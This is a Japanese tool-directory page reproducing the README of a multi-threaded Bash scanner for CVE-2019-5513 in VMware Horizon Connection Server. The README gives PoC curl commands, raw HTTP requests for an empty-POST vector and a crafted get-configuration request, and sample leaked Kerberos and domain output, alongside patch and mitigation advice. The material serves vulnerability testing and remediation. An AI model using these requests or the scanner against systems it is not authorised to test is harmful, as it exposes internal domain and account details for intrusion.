Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-5513-scanner — VMWare Horizon Connection Serverは、組織の仮想デスクトップ環境(VDI)へのインターネット接続用ゲートウェイとしてよく使用されます。最近まで、これらのインストールのほとんどは、Connection Serverの内部名、ゲートウェイの内部IPアドレス、およびActive Directoryドメインを、認証されていない攻撃者に公開していました。 | Kitploit
ツール/GitHubGitHub/sudosu01/cve-2019-5513-scanner
偵察脆弱性スキャナーエクスプロイト情報収集ウェブセキュリティペネトレーションテスト
GitHubsudosu01/cve-2019-5513-scanner

CVE-2019-5513-scanner

VMWare Horizon Connection Serverは、組織の仮想デスクトップ環境(VDI)へのインターネット接続用ゲートウェイとしてよく使用されます。最近まで、これらのインストールのほとんどは、Connection Serverの内部名、ゲートウェイの内部IPアドレス、およびActive Directoryドメインを、認証されていない攻撃者に公開していました。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
2ヶ月前未レビュー

VMware Horizon /broker/xml 脆弱性スキャナ

Security Bash License

VMware Horizon Connection Server の /broker/xml エンドポイントにおける非認証の情報漏えい脆弱性を検出する、高性能なマルチスレッドスキャナです。

📋 概要

VMware Horizon Connection Server は、認証を必要とせずに機密性の高い内部設定情報を漏えいさせる可能性がある XML API エンドポイント(/broker/xml)を公開しています。このスキャナは、2つの攻撃ベクトルをテストすることで、脆弱なサーバーを迅速に特定します:

  1. 空の POST ボディ(ゼロデイ発見) — 完全に空の POST リクエストを送信します。サーバーは XML コマンドなしで設定データを漏えいさせます。
  2. 細工された XML (CVE-2019-5513) — 文書化された get-configuration XML コマンドを使用します。

🔍 脆弱性の詳細

どのような情報が漏えいする可能性がありますか?

root@kitploit:~
<?xml version="1.0" encoding="utf-8"?>
<broker>
    <configuration>
        <broker-service-principal>
            <type>kerberos</type>
            <name>[email protected]</name>
        </broker-service-principal>
        <domain>corporate-domain.example.com</domain>
    </configuration>
</broker>

⚡ 特徴

  • 超高速 — マルチスレッドアーキテクチャ(デフォルト 50 の同時スレッド)

  • デュアルプロトコルテスト — HTTPS(ポート 443)と HTTP(ポート 80)の両方を同時にチェック

  • 2つの攻撃ベクトル — 空の POST ボディ(ゼロデイ)+ 細工された XML (CVE-2019-5513)をテスト

  • 短いタイムアウト — リクエストあたり最大 5 秒、接続タイムアウト 3 秒

  • 明確な出力 — 脆弱なホストには完全な XML レスポンス付きの色分けされた結果

  • 結果のエクスポート — すべての検出結果を -o オプションでファイルに保存

  • 依存関係なし — curl のみを使用(ほとんどのシステムで標準)

🚀 インストール

root@kitploit:~
# Clone the repository
git clone https://github.com/sudosu01/CVE-2019-5513-scanner.git

cd vmware-horizon-scanner

# Make the script executable
chmod +x broker.sh

📖 使い方

基本スキャン

root@kitploit:~
./broker.sh -d targets.txt

カスタムスレッドでスキャン(より高速)

root@kitploit:~
./broker.sh -d targets.txt -t 100

スキャンして結果を保存

root@kitploit:~
./broker.sh -d targets.txt -t 100 -o results.txt

コマンドラインオプション

オプション説明
-d IP アドレス/ホスト名のリストを含む入力ファイル(1行に1つ)
-t スレッド数(デフォルト: 50)
-o 結果を保存する出力ファイル
-hヘルプメッセージを表示

入力ファイルの形式 (targets.txt)

root@kitploit:~
# Comments start with #
185.171.101.236
192.168.1.100
10.0.0.50
example-vmware.com

📊 出力例

root@kitploit:~
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   VMware Horizon /broker/xml Vulnerability Scanner
   Multi-Threaded Mode - 50 threads
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[*] Testing: Empty POST (Zero-Day) + Crafted XML (CVE-2019-5513)
[*] Protocols: HTTPS + HTTP (both tested simultaneously)

[*] Scanning 3 hosts...

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] 185.171.101.236 | VULNERABLE | HTTPS | EMPTY_POST
Response:
<?xml version="1.0" encoding="utf-8"?>
<broker>
    <configuration>
        <broker-service-principal>
            <type>kerberos</type>
            <name>TEST-SERVER$@DOMAIN</name>
        </broker-service-principal>
    </configuration>
</broker>
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[-] 192.168.1.100 | NOT VULNERABLE

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] 10.0.0.50 | VULNERABLE | HTTP | CRAFTED_XML
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[*] SCAN COMPLETE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
    Total hosts: 3
    Vulnerable: 2
    Not vulnerable: 1
    Time taken: 4 seconds

🔬 Burp Suite でのテスト

手動テスト用に、生のリクエストを以下に示します:

テスト 1: 空の POST ボディ(ゼロデイ)

root@kitploit:~
POST /broker/xml HTTP/1.1
Host: target.example.com
Content-Type: text/xml
User-Agent: VMware-Horizon-Client
Content-Length: 0

テスト 2: 細工された XML (CVE-2019-5513)

root@kitploit:~
POST /broker/xml HTTP/1.1
Host: target.example.com
Content-Type: text/xml
User-Agent: VMware-Horizon-Client
Content-Length: 115

<?xml version='1.0' encoding='UTF-8'?><broker version='10.0'><get-configuration></get-configuration></broker>

📝 PoC curl コマンド

空の POST ボディ

root@kitploit:~
curl -k -X POST "https://target/broker/xml" \
  -H "Content-Type: text/xml" \
  -H "User-Agent: VMware-Horizon-Client" \
  -d ''

細工された XML

root@kitploit:~
curl -k -X POST "https://target/broker/xml" \
  -H "Content-Type: text/xml" \
  -H "User-Agent: VMware-Horizon-Client" \
  --data-binary '<?xml version="1.0" encoding="UTF-8"?><broker version="10.0"><get-configuration></get-configuration></broker>'

🛡️ 修復

VMware Horizon Connection Server をパッチ適用済みバージョンにアップグレードしてください:

バージョン修正リリース
7.x7.8 以降
7.5.x7.5.2 以降
6.x6.2.8 以降

追加の緩和策:

  • ネットワークアクセス制御を実装して /broker/xml エンドポイントへのアクセスを制限する

  • WAF ルールを使用して、このエンドポイントへの非認証リクエストをブロックする

  • /broker/xml への不審な POST リクエストを監視する

🙏 クレジット

このツールは、以下のセキュリティ研究者による研究に基づいています:

  • 当初の CVE-2019-5513 発見 — Atredis Partners

  • Critical Start の Cory Mathews(独立した発見)

このツールにおけるゼロデイ発見

空の POST ボディ攻撃ベクトルは、追加調査中に特定されました。元の CVE は細工された XML ペイロードを必要としていました。このツールは、ペイロードの構築が不要で、さらに簡単に実行できる空のボディ方式もテストします。

⚠️ 免責事項

このツールは、教育目的および許可を得たセキュリティテストのみを対象としています。所有していない、またはテストする明示的な許可を得ていないシステムを無断でスキャンすると、法律や規制に違反する可能性があります。作者は誤用に対する責任を負いません。

📄 ライセンス

MIT ライセンス

⭐ サポート

このツールが役立つと思われた場合は、GitHub でスターを付けていただければ幸いです!

ツールをダウンロード
属性値
CVECVE-2019-5513
CVSS スコア5.3 (中)
ベクターAV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
影響を受ける製品VMware Horizon Connection Server 7.8 より前の 7.x、7.5.2 より前の 7.5.x、6.2.8 より前の 6.x
漏えいする情報Active Directory のドメイン名、サービスアカウント名(マシンアカウント)、内部ホスト名、ゲートウェイ IP アドレス